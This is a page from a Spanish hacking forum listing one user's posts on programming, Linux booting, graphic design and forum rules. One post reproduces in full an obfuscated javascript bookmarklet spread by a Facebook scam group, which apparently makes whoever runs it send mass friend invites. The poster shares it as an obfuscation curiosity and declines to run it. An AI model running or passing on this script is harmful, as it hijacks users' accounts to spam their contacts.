elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: 1 [2] 3 4 5
11  Programación / Desarrollo Web / [javascript] para quien se aburra en: 6 Julio 2010, 21:22 pm
Me han invitado a un grupo de facebook: "99% of people can't watch this video more than 25 seconds"

Allí te dicen que vayas a esta dirección, que es un script:

Código
  1. javascript:(function(){a='app107489592636080_PKhcGc';b='app107489592636080_xKbQFX';hzgjtD='app107489592636080_hzgjtD';yhXHmG='app107489592636080_yhXHmG';BWKgQn='app107489592636080_BWKgQn';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||BWKgQn|fs|SocialGraphManager|for|in|if|20|yhXHmG|hzgjtD|21|2000|4000|3000'.split('|'),0,{}))})();

No os quejaréis que os lo doy con colores y todo...

El caso es que me da igual lo que haga la función, me da igual el vídeo y en general me da igual lo que pase en facebook, para mí es una libreta de direcciones con trackback. Y desde luego no me voy a poner a ejecutar tronchos de javascript que no sé lo que hacen, de dónde vienen ni los controles que pueden haber pasado. Tal vez en una máquina virtual, si tuviera tiempo e interés. Pero he pensado que os puede interesar a los que estéis aprendiendo javascript, ofuscación, etc.
12  Sistemas Operativos / GNU/Linux / [confirmado] 2.5'' con GRUB arranca desde caja USB en: 7 Junio 2010, 20:21 pm
Voy a poner un disco duro que tiene GRUB como gestor de arranque en una caja USB para discos duros (es un disco duro de portátil, de 3.5'' o las que tengan, con sus sectores, sus platos girando, toda la historia).

Quería saber si arrancaría desde ahí, porque sería importante que lo hiciera y me va a llevar un buen rato clonando el disco, etc. no quería llevarme el chasco después.

Puede que dependa de la caja, que tenga que mapear el sector de arranque del disco duro y mostrarlo como arranque del USB, que no sé si será distinto pero mucho no puede serlo.

Mi teoría es que debería funcionar porque los requisitos que habría de cumplir la caja para esto son mínimos. Pero soy un optimista empedernido y la realidad constantemente me sorprende siendo peor de lo que esperaba, así que he decidido preguntar, porque si no funciona tendré poco tiempo de margen de acción para buscar un "workaround" (de esos que tan de moda están).

Gracias.

PD: la pregunta era un poco tonta pero importante, ya está confirmado. (Evidentemente y por si acaso, arrancará un ordenador que sea igual, porque requiere drivers y todas esas movidas, si no es igual ya dependerá de las diferencias y cada caso particular)
13  Programación / Programación General / ¿Qué lenguajes de programación usas? en: 17 Enero 2010, 20:45 pm
Esto no es una competición para ver quien sabe programar en más lenguajes, si no programáis habitualmente en algún lenguaje simplemente no lo marquéis. No seáis críos, en la anterior encuesta había gente que respondía con un mensaje para presumir y no respondía en la encuesta, que es lo que vale. Si programáis habitualmente en algo que no está en la lista responded al tema indicando el lenguaje en negrita.

Es bueno tener una encuesta que muestre las preferencias del resto de gente del foro en cuanto al lenguaje que escogen para programar. Es una pregunta habitual cuál es el lenguaje que se debería aprender para programar y la popularidad de un determinado lenguaje de programación es un factor a tener en cuenta. Puesto que hay más factores a tener en cuenta, esto puede cambiar, así que la encuesta se renueva cada dos años.

html no es un lenguaje de programación, es un lenguaje de marcado, probablemente latex tenga más de lenguaje de programación que html.
14  Media / Diseño Gráfico / ¿Cómo conseguir efecto de brillo eléctrico? en: 11 Septiembre 2009, 08:50 am
Por llamarlo de alguna forma, realmente no sé cómo se llama, y por tanto no he buscado en internet, mis disculpas. A ver si alguien tiene un tutorial o alguna explicación, porque esto del photoshop es interesante pero sé lo justo:

Este es el original:



Esta es la imagen modificada:


Si no pudiera ser también me vale así, aunque es mucho peor:



Muchas gracias.
15  Programación / Ejercicios / Ejercicio: las posibles combinaciones de una lista [python] en: 3 Septiembre 2009, 15:46 pm
Tengo que hacer todas las posibles combinaciones de una lista (cuidado, he dicho combinaciones, no permutaciones), esto significa las combinaciones tomadas de uno en uno de todos los elementos de la lista (es decir, sus elementos), de dos en dos, y así hasta las combinaciones de n en n elementos siendo n la longitud de  la lista, es decir, sólo habrá una combinación de ese tamaño.

Lo estoy programando en python, así que si no me distraen mucho pondré la solución en ese lenguaje dentro de poco, pero puede ser un ejercicio interesante también para otros lenguajes.
16  Programación / Ejercicios / Ejercicio: factorización de un número, creación de "palabras" [python] en: 21 Julio 2009, 17:25 pm
Por cosas de la vida me viene bien tener un algoritmo para hacer la descomposición factorial de un número y lo voy a hacer ahora en python.

Puede ser un ejercicio interesante, es como el típico de hallar los números primos pero ampliándolo con algo más.

Personalmente lo voy a ampliar (más) después a hallar el mínimo número de factores del número original, teniendo de los m factores m+0.5/2 que sean menores de 26 y m/2 menores de 5, para formar palabras. Pero eso ya lo dejo a lo que quiera hacer cada uno.

Dentro de un rato pongo el código, si no me interrumpen.
17  Programación / Scripting / Reglas del foro de Scripting ( LEER ANTES DE POSTEAR ) en: 23 Febrero 2008, 22:18 pm
La última actualización de estas normas fue realizada el día 21/03/2020


Normas del tablón de Scripting:

Este tablón está sujeto a las normas generales del foro y a las normas de los tablones de programación,
cualquier incumplimiento de dichas normas será sancionada también en el tablón de Scripting.

Entre dichas normas cabe destacar las siguientes:

• El respeto hacia los demás.
• La utilización de títulos descriptivos.
• Formular una pregunta de forma descriptiva.
• No abusar de las mayúsculas ni de las letras en color.
• Buscar información en el buscador del foro y en los motores de búsqueda antes de formular una pregunta.


Además, se deben respetar una serie de normas específicas para el tablón de Scripting:

• Cualquier tipo de código debe ser escrito en el interior de su respectiva etiqueta GeShi, como en el siguiente ejemplo:
Cita de: Ejemplo de código con formato
Código:
Código

• No se permite la publicación de archivos compilados sin proporcionar el código fuente.

• No se permite la publicación de recopilatorios y/o Rankings relacionados con Retos de programación, ya existe una zona dedicada a ello,
  para contribuir un reto o participar solo deben seguir las reglas de participación de la Zona de Retos de Scripting
  Nota: Está permitido publicar un post con un reto (solo uno) sin previo consentimiento del encargado de la zona de Retos de Scripting.
          





Otros aspectos importantes a tener en cuenta:

Es conveniente leer los siguientes temas para tener en cuenta como se debe formular una pregunta de forma adecuada:

10 pasos para plantear una duda informática
FAQ : Como hacer preguntas "inteligentes"

Puesto que en este tablón se da cabida a varios lenguajes de programación es aconsejable el uso de etiquetas en el título, que indiquen el lenguaje sobre el que es la duda, por ejemplo:
[PYTHON] ¿Alguna buena librería para implementar servicios web?





Cualquier tema que incumpla alguna de las normas mencionadas anteriórmente puede ser bloqueado o eliminado sin previo aviso hacia el autor.


18  Media / Diseño Gráfico / ¿de jpeg a gif sin morir en el intento? en: 5 Febrero 2008, 04:28 am
Tengo un jpeg y me gustaría hacer un gif que muestre ese jpeg pero haciendo un recorrido sobre el mismo, mostrando una parte cada vez. Es un plano grande del que quería hacer una pequeña imagen que muestre cómo se recorre el camino.

¿Hay alguna forma de hacerlo que no sea a mano y frame por frame? Creo que con macromedia flash se puede (aunque no sé cómo) pero el gif resultante tiene muy poca calidad, sería importante que conservara la calidad y que no fuera muy complicado...

Muchas gracias.
19  Programación / Scripting / [bash|python] Enviar mail con adjuntos. en: 13 Agosto 2007, 23:28 pm
He estado buscando cómo enviar un mail con adjuntos desde un script, ya sea en bash o en python. En bash no he encontrado nada. En python he encontrado la librería smtplib, que permite utilizar una cuenta en "cualquier" servicio de e-mail gratuito que proporcione un smtp, siempre y cuando no use SSL, puesto que todavía no está implementado en smtplib, "desafortunadamente" todos usan SSL actualmente.

¿Alguien sabe cómo podría hacer un script facilito para enviar un mail con archivos adjuntos?

Gracias.
20  Programación / Programación C/C++ / Recopilatorio: Temas importantes de programación C/C++ en: 28 Julio 2007, 21:16 pm
***********FAQ************Consejos, secretos y tips sobre C++
***********FAQ************ Preguntas Frecuentes y Errores comunes en C++
Mis Programas/Basicos
Curso de Programacion C
Novato en C y Dev-c++
Generador de IPs aleatorias y algoritmo basico Brute Force (codigos fuente en C)
Introduccion al uso de sockets en C
Sockets en C++ y windows (una ayudita).
¿ C o C++?
[Curso]Curso de Comunicacion de Procesos en C, por Diabliyo !!! (UP 13 Dic )
INTRODUCCIÓN AL LENGUAJE C (BÁSICO)
Recopilacion de temas, Manuales, IDE's y Compiladores


PS: Cada usuario puede añadir sus recomendaciones de hilos relevantes en el tablón, pero ése es el único tipo de mensajes permitido en este hilo.
Páginas: 1 [2] 3 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines